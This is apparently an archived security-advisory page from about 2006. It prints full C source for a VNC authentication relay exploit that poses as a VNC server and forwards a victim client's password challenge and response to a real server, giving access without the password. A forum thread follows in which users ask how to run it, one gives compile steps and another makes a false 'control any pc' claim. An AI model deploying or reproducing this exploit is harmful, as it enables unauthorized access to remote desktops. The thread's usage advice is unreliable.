|
Brought to you by:
Suppliers of:
|
|
|
| |
| By using the below exploit code it is possible to use a VNC server without knowing its password by causing a client to authenticate through the attacking host, while the attacker redirects it to the server. |
| |
Credit:
The information has been provided by rsmc.
|
| |
Exploit:
#include <netinet/in.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#define VNCPORT 5900
#define VNCSERVER "x.x.x.x"
#define QUEUE 8
#define BUFSIZ 512
typedef char rfbProtocolVersionMsg[13];
#define sz_rfbProtocolVersionMsg 12
int main (int argc, char **argv) {
int sockfd, clientfd, vncfd;
int nbytes = 0;
struct sockaddr_in server, client, vnc;
int len = sizeof (client);
char buf [BUFSIZ];
if ( (sockfd = socket (AF_INET, SOCK_STREAM, 0) ) == -1) {
perror ("socket");
exit (-1);
}
bzero (&server, sizeof (server) );
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl (INADDR_ANY);
server.sin_port = htons (VNCPORT);
/* this is the fake VNC server */
if (bind (sockfd, (struct sockaddr *) &server,
sizeof (server) ) == -1) {
perror ("bind");
exit (-1);
}
listen (sockfd, QUEUE);
if ( (clientfd = accept (sockfd,
(struct sockaddr *) &client, &len) ) == -1) {
perror ("accept");
exit (-1);
}
strcpy (buf, "RFB 003.003\n");
/* we must send VNC version number (from protocol) */
if (write (clientfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we also must read VNC version number (from protocol) */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
buf [nbytes] = 0;
printf ("version -> %s\n", buf);
buf [0] = 0x00;
buf [1] = 0x00;
buf [2] = 0x00;
buf [3] = 0x02;
/* we send the authentication method code to the client */
if (write (clientfd, buf, 4) < 4) {
perror ("write");
exit (-1);
}
if ( (vncfd = socket (AF_INET, SOCK_STREAM, 0) ) == -1) {
perror ("socket");
exit (-1);
}
bzero (&vnc, sizeof (vnc) );
vnc.sin_family = AF_INET;
vnc.sin_addr.s_addr = inet_addr (VNCSERVER);
vnc.sin_port = htons (VNCPORT);
/* we connect to the real VNC server */
if (connect (vncfd, (struct sockaddr *) &vnc,
sizeof (vnc) ) == -1) {
perror ("connect");
exit (-1);
}
/* again, we read version number from the VNC server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
strcpy (buf, "RFB 003.003\n");
/* and we send ours */
if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we now read authenticarion method code from VNC server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* here is the challenge from server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the challenge to the victim client */
if (write (clientfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we have the encrypted password from the client */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the encrypted password to the VNC server */
if (write (vncfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we read the result from the authentication process */
if (read (vncfd, buf, BUFSIZ) < 4) {
perror ("read");
exit (-1);
}
/* at this point we should be authenticated */
/* place whatever code you want here */
close (clientfd);
close (sockfd);
close (vncfd);
return 0;
}
|
| Subject:
|
h2 |
Date: |
19 May 2006 |
| From: |
tofu |
hi.
how to use this exploit?
where to copy the code?
greez |
|
| Subject:
|
h3 |
Date: |
11 Jul. 2006 |
| From: |
futo |
| copy to notepad and save as test.exe, run and you control any pc running vnc server |
|
| Subject:
|
compiled exe |
Date: |
13 Aug. 2006 |
| From: |
juan |
futo this method don't work at all... how can i use the exploit...
thanks... |
|
| Subject:
|
duh |
Date: |
16 Aug. 2006 |
| From: |
amcu |
sure it does not work like copy paste + save..
its c source code.. first you should learn how to program and understand code |
|
| Subject:
|
urgent |
Date: |
23 Sep. 2006 |
| From: |
basraj2yahoo.com |
Dear Sir,
How to use this progralm just give an easy steps to use this program.
i will very thankfull you
i will wait for ur urgent replay. |
|
| Subject:
|
compile it |
Date: |
2 Nov. 2006 |
| From: |
jokers child |
| you have to -compile it- google that if u dont know what it means |
|
| Subject:
|
COMpile |
Date: |
29 Nov. 2006 |
| From: |
DroP3R_Meo |
| it s a C code source , first it must be compiled in linux , save this code as exploit.c then compile it with gcc under linux gcc -o exploit exploit.c after u can execute it just type ./exploit ...... good luck :p |
|
| Subject:
|
lazy peope - figure it out yourself |
Date: |
7 Dec. 2006 |
| From: |
amps |
| Pick up a book and lean how to run this simple program, instead of bugging everone on earth to do it for you. Freakin lazy stupid people... |
|
| Subject:
|
google |
Date: |
25 Dec. 2006 |
| From: |
Spawn |
| everything can be learn in google...why don't you spend some time reading/researching/understand instead of asking someone to do it... |
|
| Subject:
|
ok |
Date: |
31 Dec. 2006 |
| From: |
oasdi |
| WTF how this exploit is used, ok it listens on a port so you have to force the client to believe you are the server or what? |
|
| Subject:
|
error in compile |
Date: |
3 Feb. 2007 |
| From: |
carlosbalamamado_20hotmail.com |
hi, when i try to compile the code, return this:
xploitvnc.c: In function ?ain?
xploitvnc.c:43: warning: pointer targets in passing argument 3 of ?ccept?differ in signedness
xploitvnc.c:63: warning: incompatible implicit declaration of built-in function ?rintf?
someone explain me, or help to fix this. thanks |
|
| Subject:
|
source code |
Date: |
19 Oct. 2007 |
| From: |
asimo_romziyahoo.com |
hi dude,
hye i think this script not complete..because when im analyst it again and again i found the error while running this program..its not stable..please try to figure it out..
thanx |
|
| Subject:
|
header files |
Date: |
26 Oct. 2007 |
| From: |
Jolan |
Hey all,
I tried to compile the source-code but I got an error message. I need the header files. Where I can download them? |
|
| Subject:
|
like they have said... |
Date: |
11 Sep. 2008 |
| From: |
skisky |
this code is C/C++
and sounds like its for linux....because i get "e;undeclared"e; errors when i try to compile in windows with Dev- C++ 4.9
if it were only basic statements that were not declared, i would fix it myself. But there is more than, which is undeclared. |
|
|
|
|
|
|
